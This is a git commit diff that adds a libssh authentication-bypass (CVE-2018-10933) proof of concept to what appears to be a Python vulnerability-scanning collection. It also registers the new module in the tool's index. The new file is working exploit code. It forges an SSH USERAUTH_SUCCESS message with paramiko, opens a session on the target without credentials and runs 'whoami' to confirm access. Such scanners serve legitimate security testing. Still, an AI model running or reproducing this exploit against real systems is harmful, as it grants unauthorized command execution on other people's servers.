add poc libssh CVE-2018-10933

2018-10-23 16:44:42 +08:00
parent f6ba0f860d
commit b0950929b1
5 changed files with 63 additions and 0 deletions
--- a/pocdb.py
+++ b/pocdb.py
@@ -293,6 +293,7 @@ class pocdb_pocs:
            "东方电子SCADA通用系统信息泄露":dfe_scada_conf_disclosure_BaseVerify(url),
        }
        self.systempocdict = {
+            "libssh身份绕过漏洞(CVE-2018-10933)":libssh_bypass_auth_BaseVerify(url),
            "ElasticSearch未授权漏洞":elasticsearch_unauth_BaseVerify(url),
            "CouchDB 未授权漏洞":couchdb_unauth_BaseVerify(url),
            "zookeeper 未授权漏洞":zookeeper_unauth_BaseVerify(url),
--- a/requirements.txt
+++ b/requirements.txt
@@ -5,4 +5,5 @@ pexpect
 termcolor
 pymysql
 pymongo
+paramiko
 elasticsearch
--- a/system/ssh/init.py
+++ b/system/ssh/init.py
--- a/system/ssh/libssh_bypass_auth.py
+++ b/system/ssh/libssh_bypass_auth.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: libssh身份绕过漏洞(CVE-2018-10933)
+referer: https://www.anquanke.com/post/id/162225
+author: from https://github.com/blacknbunny/libSSH-Authentication-Bypass
+env source:https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md
+description: 漏洞源于未经过验证的session操纵SSH2_MSG_USERAUTH_SUCCESS导致的身份验证绕过。
+'''
+import sys
+import socket
+import paramiko
+import warnings
+import tempfile,sys
+from termcolor import cprint
+from urllib.parse import urlparse
+
+sys.stderr=tempfile.TemporaryFile()
+
+class libssh_bypass_auth_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        port = 22
+        if r"http" in self.url:
+            #提取host
+            host = urlparse(self.url)[1]
+            try:
+                port = int(host.split(':')[1])
+            except:
+                pass
+            flag = host.find(":")
+            if flag != -1:
+                host = host[:flag]
+        else:
+            host = self.url
+
+        try:
+            sock = socket.socket()
+            sock.connect((host, port))
+            message = paramiko.message.Message()
+            transport = paramiko.transport.Transport(sock)
+            transport.start_client()
+            message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
+            transport._send_message(message)
+            cprint("[*]发现"+host+":"+str(port)+" 版本:"+transport.remote_version, "green")
+            spawncmd = transport.open_session(timeout=10)
+            spawncmd.exec_command("whoami")
+            if spawncmd.recv_exit_status() == 0:
+                cprint("[+]存在libssh身份绕过漏洞...(高危)\tpayload: "+host+":"+str(port), "red")
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = libssh_bypass_auth_BaseVerify(sys.argv[1])
+    testVuln.run()
--- a/system/systemmain.py
+++ b/system/systemmain.py
@@ -6,6 +6,9 @@ referer: unknow
 author: Lucifer
 description: 包含所有system漏洞类型，封装成一个模块
 '''
+#ssh漏洞
+from system.ssh.libssh_bypass_auth import libssh_bypass_auth_BaseVerify
+
 #elasticsearch vulns
 from system.elasticsearch.elasticsearch_unauth import elasticsearch_unauth_BaseVerify